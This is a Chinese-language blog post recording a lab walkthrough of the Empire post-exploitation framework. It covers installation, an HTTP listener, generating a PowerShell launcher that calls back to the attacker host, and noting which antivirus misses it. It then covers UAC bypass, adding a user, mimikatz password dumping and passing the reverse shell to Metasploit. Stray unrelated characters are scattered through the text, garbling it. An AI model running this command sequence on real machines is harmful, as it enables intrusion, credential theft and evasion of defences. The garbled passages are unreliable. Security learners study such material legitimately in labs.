前言
最近在看《Web安全攻防》一書晃财,將不熟悉的Empire進(jìn)行實(shí)驗(yàn)操作來(lái)學(xué)習(xí)苫昌。
參考資料《Web安全攻防滲透測(cè)試實(shí)戰(zhàn)指南》
Empire安裝
安裝Empire工具比較簡(jiǎn)單驼壶。笑跛。選擇直接安裝在kali
git clone? https://github.com/EmpireProject/Empire.git
cd /Empire/setup
./install
實(shí)驗(yàn)操作
靶機(jī):windows service pack1 虛擬機(jī) (裝有電腦管家)(IP:192.168.72.154)
攻擊機(jī):kali(IP:192.168.72.163)
啟動(dòng)Empire
listeners? 監(jiān)聽
uselistener? http? 選擇監(jiān)聽的模式
info? 查看參數(shù)設(shè)置
set? Name? cseroad? ? 設(shè)置名字
set Host? 192.168.72.163? 設(shè)置本主機(jī)IP
execute? 執(zhí)行監(jiān)聽
list? 查看列出當(dāng)前激活的listener
agents? 查看會(huì)話
注:開啟多個(gè)監(jiān)聽時(shí),名稱必須不一樣生百,而且端口也必須不一樣,否則不能創(chuàng)建午绳。
launcher? powershell? cseroad? 生成payload
將該代碼在靶機(jī)win7的cmd下運(yùn)行置侍。
可以看到Empire已經(jīng)上線了一個(gè)名為UVXTMAE7的主機(jī),且電腦管家沒(méi)有提示。
在360上運(yùn)行則出現(xiàn)了提示
更多木馬生成:
interact? UVXTMAE7? 命令進(jìn)入會(huì)話
shell? ipconfig? 執(zhí)行系統(tǒng)命令
systinfo? 查看該靶機(jī)基本信息
sc? 截圖
更多命令:help
提權(quán)
bypassuac? cseroad? 自動(dòng)提權(quán)
*表示提權(quán)成功
添加用戶成功蜡坊。
mimikatz? 讀取hash,獲取管理員密碼
結(jié)合metasploit
usemodule? code_execution/invoke_shellCode? 使用模塊
set Lhost? 192.168.72.163
set? Lport? 8088
msf設(shè)置的參數(shù)和use? module 保持一致杠输。
得到Empire反彈的shell